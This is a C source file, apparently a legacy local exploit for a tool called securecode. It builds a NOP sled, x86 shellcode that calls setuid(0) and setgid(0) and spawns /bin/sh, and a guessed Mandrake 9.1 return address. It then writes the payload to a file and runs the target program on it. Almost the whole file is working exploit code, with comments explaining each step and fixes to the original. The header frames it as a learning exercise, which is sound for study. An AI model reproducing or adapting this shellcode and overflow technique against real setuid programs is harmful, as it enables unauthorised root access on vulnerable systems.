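/* securecode-xp.c
 *
 * Vuln: securecode.c (the one from tidbit) -- "program to check for vulns
 *       in source code".
 * Vuln author: someone else.   Exploit author: Lucas G.   Modified by j0e.
 * Impact: it helped me learn; other than that, almost useless.
 *
 * Compiling: gcc seccode.c -o seccode
 * Usage:     ./seccode [offset]
 *
 * Tips: make sure the securecode binary is in the same directory AND has
 * the same name as in the execl() call below, i.e.:
 *
 *     execl("./securecode", "securecode", "-s", "bigbuff", (char *)NULL);
 *
 * Credits: teleh0r (for his tutorial bof4kids, and for the code this was
 *          modified from -- thought it looked familiar?)
 *          Shellcode possibly by c0ntex.
 *
 * What this does / what it assumes:
 *   - Builds a LEN-byte payload laid out as: NOP sled, shellcode, then the
 *     candidate return address repeated for the last RET_TAIL bytes.  It
 *     writes that payload to the file "bigbuff" and execs
 *     "./securecode -s bigbuff".
 *   - RET is a hard-coded Mandrake 9.1 stack address, written into the
 *     payload in host byte order as a 32-bit value, so this only makes
 *     sense for a 32-bit little-endian x86 target (the shellcode is x86
 *     int 0x80 code).  On any system with stack ASLR and/or a non-exec
 *     stack both the guessed address and the stack-resident shellcode are
 *     dead on arrival; that is a property of the target, not of this file.
 *   - Fixes relative to the original listing: the #include line had lost
 *     its header names; the payload was emitted with fprintf("%s") from a
 *     buffer that was never NUL-terminated (read past the buffer, and any
 *     NUL in the address would truncate the payload); the address-fill
 *     loop wrote a whole `long` at offset 288 of a 289-byte buffer;
 *     fopen()/fclose()/execl() results were ignored; the execl() sentinel
 *     was a bare 0.
 */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* kode ripped from kon2.c -- setuid(0); setgid(0); execve("/bin//sh");
 * exit(0).  Contains no NUL bytes, so strlen() gives its true length. */
char codez[] =
    /* setuid(0); */
    "\x31\xdb"             /* xor  %ebx,%ebx */
    "\x89\xd8"             /* mov  %ebx,%eax */
    "\xb0\x17"             /* mov  $0x17,%al */
    "\xcd\x80"             /* int  $0x80     */
    /* setgid(0); */
    "\x31\xdb"             /* xor  %ebx,%ebx */
    "\x89\xd8"             /* mov  %ebx,%eax */
    "\xb0\x2e"             /* mov  $0x2e,%al */
    "\xcd\x80"             /* int  $0x80     */
    /* /bin/sh execve(); */
    "\x31\xc0"             /* xor  %eax,%eax */
    "\x50"                 /* push %eax      */
    "\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
    "\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
    "\x89\xe3"             /* mov  %esp,%ebx */
    "\x50"                 /* push %eax      */
    "\x53"                 /* push %ebx      */
    "\x89\xe1"             /* mov  %esp,%ecx */
    "\x31\xd2"             /* xor  %edx,%edx */
    "\xb0\x0b"             /* mov  $0xb,%al  */
    "\xcd\x80"             /* int  $0x80     */
    /* exit(0); */
    "\x31\xdb"             /* xor  %ebx,%ebx */
    "\x89\xd8"             /* mov  %ebx,%eax */
    "\xb0\x01"             /* mov  $0x01,%al */
    "\xcd\x80";            /* int  $0x80     */

#define NOP      0x90
#define LEN      289          /* payload size handed to the target          */
#define RET      0xbffff314   /* Mandrake 9.1 stack address; tune with [offset] */
/* Bytes of repeated return address kept after the shellcode.  The larger
 * this is, the shorter the NOP sled at the front of the payload. */
#define RET_TAIL 40

/*
 * Entry point.
 *
 * argv[1] (optional) is a signed offset added to RET; accepts decimal,
 * 0x-hex or 0-octal as strtol() does.  Returns 1 on a bad offset, on any
 * failure writing "bigbuff", or if execl() fails (a successful exec never
 * returns).
 */
int main(int argc, char *argv[])
{
    unsigned char buffer[LEN];
    long offset = 0;
    size_t codelen = strlen(codez);
    size_t i;

    if (argc > 1) {
        char *end = NULL;

        errno = 0;
        offset = strtol(argv[1], &end, 0);
        if (end == argv[1] || *end != '\0' || errno == ERANGE) {
            fprintf(stderr, "bad offset: %s\n", argv[1]);
            return 1;
        }
    }

    /* Truncate to 32 bits: the target is 32-bit, and this is the width we
     * copy into the payload below. */
    uint32_t retaddr = (uint32_t)(RET + offset);

    printf("\n Modified by j0e! \nOriginal code from:");
    printf("\n- (c) teleh0r@doglover.com anno 2000 -\n");
    printf("Use : %s [offset] \n", argv[0]);
    printf("Using: address 0x%lx\n\n", (unsigned long)retaddr);

    /* Fill the whole buffer with the return address, 4 bytes at a time,
     * in host byte order (matches the little-endian target).  LEN is not a
     * multiple of 4, so the final copy is partial instead of overrunning
     * the buffer. */
    for (i = 0; i < LEN; i += 4) {
        size_t n = (LEN - i < sizeof retaddr) ? LEN - i : sizeof retaddr;

        memcpy(buffer + i, &retaddr, n);
    }

    /* NOP sled, then the shellcode; the last RET_TAIL bytes stay as
     * return addresses.  The guard only matters if someone swaps in a
     * bigger shellcode. */
    if (codelen + RET_TAIL >= LEN) {
        fprintf(stderr, "shellcode too large for a %d-byte payload\n", LEN);
        return 1;
    }
    size_t sled = LEN - codelen - RET_TAIL;

    memset(buffer, NOP, sled);
    memcpy(buffer + sled, codez, codelen);

    /* Write exactly LEN bytes: the payload is binary and may legitimately
     * contain NUL bytes once [offset] is applied, so "%s" is the wrong
     * tool. */
    FILE *fp = fopen("bigbuff", "wb");

    if (fp == NULL) {
        perror("fopen bigbuff");
        return 1;
    }
    if (fwrite(buffer, 1, LEN, fp) != LEN) {
        perror("write bigbuff");
        fclose(fp);
        return 1;
    }
    if (fclose(fp) != 0) {          /* fclose flushes; a short write shows up here */
        perror("close bigbuff");
        return 1;
    }

    execl("./securecode", "securecode", "-s", "bigbuff", (char *)NULL);
    perror("execl ./securecode");   /* only reached if the exec failed */
    return 1;
}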